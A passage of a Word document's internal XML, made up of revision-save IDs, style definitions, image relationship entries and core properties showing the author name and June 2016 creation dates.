    <w:rsid w:val="009A30E2"/>
    <w:rsid w:val="009A312B"/>
    <w:rsid w:val="009A6CB6"/>
    <w:rsid w:val="009B1032"/>
    <w:rsid w:val="009B22DD"/>
    <w:rsid w:val="009B2F37"/>
    <w:rsid w:val="009C0A1A"/>
    <w:rsid w:val="009C0DB5"/>
    <w:rsid w:val="009C4ADF"/>
    <w:rsid w:val="009C7DDD"/>
    <w:rsid w:val="009D176B"/>
    <w:rsid w:val="009D2FB2"/>
    <w:rsid w:val="009D4349"/>
    <w:rsid w:val="009E21C7"/>
    <w:rsid w:val="009E4062"/>
    <w:rsid w:val="009F0F01"/>
    <w:rsid w:val="009F22CD"/>
    <w:rsid w:val="009F2F1B"/>
    <w:rsid w:val="009F4998"/>
    <w:rsid w:val="009F7E35"/>
    <w:rsid w:val="00A04CA1"/>
    <w:rsid w:val="00A07086"/>
    <w:rsid w:val="00A1255A"/>
    <w:rsid w:val="00A15ABE"/>
    <w:rsid w:val="00A221C3"/>
    <w:rsid w:val="00A229D1"/>
    <w:rsid w:val="00A26D74"/>
    <w:rsid w:val="00A31EFB"/>
    <w:rsid w:val="00A44DB2"/>
    <w:rsid w:val="00A60BFD"/>
    <w:rsid w:val="00A61E6E"/>
    <w:rsid w:val="00A66377"/>
    <w:rsid w:val="00A70816"/>
    <w:rsid w:val="00A81AB3"/>
    <w:rsid w:val="00A8399E"/>
    <w:rsid w:val="00A85E84"/>
    <w:rsid w:val="00A91C46"/>
    <w:rsid w:val="00A92165"/>
    <w:rsid w:val="00AB2729"/>
    <w:rsid w:val="00AB3BF8"/>
    <w:rsid w:val="00AB499A"/>
    <w:rsid w:val="00AC07DC"/>
    <w:rsid w:val="00AC31FA"/>
    <w:rsid w:val="00AD2610"/>
    <w:rsid w:val="00AD3BDD"/>
    <w:rsid w:val="00AD53FB"/>
    <w:rsid w:val="00AD5A7D"/>
    <w:rsid w:val="00AE4A34"/>
    <w:rsid w:val="00AE7C6E"/>
    <w:rsid w:val="00AF3E1B"/>
    <w:rsid w:val="00AF55D7"/>
    <w:rsid w:val="00B0084A"/>
    <w:rsid w:val="00B03347"/>
    <w:rsid w:val="00B05284"/>
    <w:rsid w:val="00B27147"/>
    <w:rsid w:val="00B3440A"/>
    <w:rsid w:val="00B4706C"/>
    <w:rsid w:val="00B47E48"/>
    <w:rsid w:val="00B55FCC"/>
    <w:rsid w:val="00B601A3"/>
    <w:rsid w:val="00B83C66"/>
    <w:rsid w:val="00B92000"/>
    <w:rsid w:val="00B92942"/>
    <w:rsid w:val="00B967C7"/>
    <w:rsid w:val="00B9773D"/>
    <w:rsid w:val="00BB44BE"/>
    <w:rsid w:val="00BB4F1F"/>
    <w:rsid w:val="00BC1609"/>
    <w:rsid w:val="00BD236F"/>
    <w:rsid w:val="00BD2402"/>
    <w:rsid w:val="00BD3C37"/>
    <w:rsid w:val="00BD3FCC"/>
    <w:rsid w:val="00BE090E"/>
    <w:rsid w:val="00BE5BB4"/>
    <w:rsid w:val="00BE6C32"/>
    <w:rsid w:val="00BF216D"/>
    <w:rsid w:val="00BF21D8"/>
    <w:rsid w:val="00C0433C"/>
    <w:rsid w:val="00C052D8"/>
    <w:rsid w:val="00C1211F"/>
    <w:rsid w:val="00C50CD6"/>
    <w:rsid w:val="00C63DC1"/>
    <w:rsid w:val="00C6444E"/>
    <w:rsid w:val="00C669C4"/>
    <w:rsid w:val="00C67A79"/>
    <w:rsid w:val="00C7078D"/>
    <w:rsid w:val="00C76240"/>
    <w:rsid w:val="00C80F7E"/>
    <w:rsid w:val="00C826F4"/>
    <w:rsid w:val="00C85941"/>
    <w:rsid w:val="00C94DD0"/>
    <w:rsid w:val="00CB64A4"/>
    <w:rsid w:val="00CB6B36"/>
    <w:rsid w:val="00CD0F3B"/>
    <w:rsid w:val="00CD2472"/>
    <w:rsid w:val="00CD30AA"/>
    <w:rsid w:val="00CE34CD"/>
    <w:rsid w:val="00CE4DD1"/>
    <w:rsid w:val="00CE5323"/>
    <w:rsid w:val="00CF6ACF"/>
    <w:rsid w:val="00D10852"/>
    <w:rsid w:val="00D175BE"/>
    <w:rsid w:val="00D37964"/>
    <w:rsid w:val="00D4358B"/>
    <w:rsid w:val="00D51CFF"/>
    <w:rsid w:val="00D53E7A"/>
    <w:rsid w:val="00D7692D"/>
    <w:rsid w:val="00D81733"/>
    <w:rsid w:val="00D86B85"/>
    <w:rsid w:val="00D90FFB"/>
    <w:rsid w:val="00D91A5D"/>
    <w:rsid w:val="00DA3433"/>
    <w:rsid w:val="00DB1E68"/>
    <w:rsid w:val="00DB278F"/>
    <w:rsid w:val="00DD3B54"/>
    <w:rsid w:val="00DD7063"/>
    <w:rsid w:val="00DD718D"/>
    <w:rsid w:val="00DE64BF"/>
    <w:rsid w:val="00DE7925"/>
    <w:rsid w:val="00DF14B1"/>
    <w:rsid w:val="00E03606"/>
    <w:rsid w:val="00E03C64"/>
    <w:rsid w:val="00E07E96"/>
    <w:rsid w:val="00E1709A"/>
    <w:rsid w:val="00E17E9F"/>
    <w:rsid w:val="00E233CE"/>
    <w:rsid w:val="00E24CCF"/>
    <w:rsid w:val="00E24FB2"/>
    <w:rsid w:val="00E264DE"/>
    <w:rsid w:val="00E43BD1"/>
    <w:rsid w:val="00E47D9F"/>
    <w:rsid w:val="00E50CB5"/>
    <w:rsid w:val="00E510DF"/>
    <w:rsid w:val="00E573D8"/>
    <w:rsid w:val="00E6013A"/>
    <w:rsid w:val="00E64E27"/>
    <w:rsid w:val="00E75C38"/>
    <w:rsid w:val="00E80F31"/>
    <w:rsid w:val="00E811E8"/>
    <w:rsid w:val="00EA088C"/>
    <w:rsid w:val="00EA2859"/>
    <w:rsid w:val="00EA616D"/>
    <w:rsid w:val="00EB115A"/>
    <w:rsid w:val="00EB335A"/>
    <w:rsid w:val="00EC0530"/>
    <w:rsid w:val="00EC34AB"/>
    <w:rsid w:val="00EC5E4E"/>
    <w:rsid w:val="00ED07AA"/>
    <w:rsid w:val="00ED2235"/>
    <w:rsid w:val="00ED574C"/>
    <w:rsid w:val="00EE4EDF"/>
    <w:rsid w:val="00EE6BAA"/>
    <w:rsid w:val="00EE70D6"/>
    <w:rsid w:val="00F03852"/>
    <w:rsid w:val="00F07E33"/>
    <w:rsid w:val="00F279B0"/>
    <w:rsid w:val="00F31BD1"/>
    <w:rsid w:val="00F31BF6"/>
    <w:rsid w:val="00F373EB"/>
    <w:rsid w:val="00F537E0"/>
    <w:rsid w:val="00F545E4"/>
    <w:rsid w:val="00F55341"/>
    <w:rsid w:val="00F607BC"/>
    <w:rsid w:val="00F61714"/>
    <w:rsid w:val="00F67772"/>
    <w:rsid w:val="00F8216A"/>
    <w:rsid w:val="00F848F5"/>
    <w:rsid w:val="00F853FE"/>
    <w:rsid w:val="00F90BDA"/>
    <w:rsid w:val="00F92D8A"/>
    <w:rsid w:val="00F93C86"/>
    <w:rsid w:val="00F97A8D"/>
    <w:rsid w:val="00FA39AA"/>
    <w:rsid w:val="00FA3AE5"/>
    <w:rsid w:val="00FA56D8"/>
    <w:rsid w:val="00FA69A5"/>
    <w:rsid w:val="00FB39EC"/>
    <w:rsid w:val="00FC737B"/>
    <w:rsid w:val="00FC7F6E"/>
    <w:rsid w:val="00FD5D79"/>
    <w:rsid w:val="00FE200C"/>
    <w:rsid w:val="00FE4367"/>
    <w:rsid w:val="00FE4BD1"/>
    <w:rsid w:val="00FE6D83"/>
    <w:rsid w:val="00FF48FD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F9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D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0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20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6520FA"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00252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E4062"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF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CE34CD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CE34C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34C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E34C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E34C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E34C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E34C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E34C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E34CD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8B5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0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8B5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0D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8B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wmf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.gi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tiff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5D22C-3283-2840-AA7E-54FD6129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1</Pages>
  <Words>5328</Words>
  <Characters>30376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laessens</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Frankie Claessens</cp:lastModifiedBy>
  <cp:revision>431</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-06-10T14:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-06-11T01:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>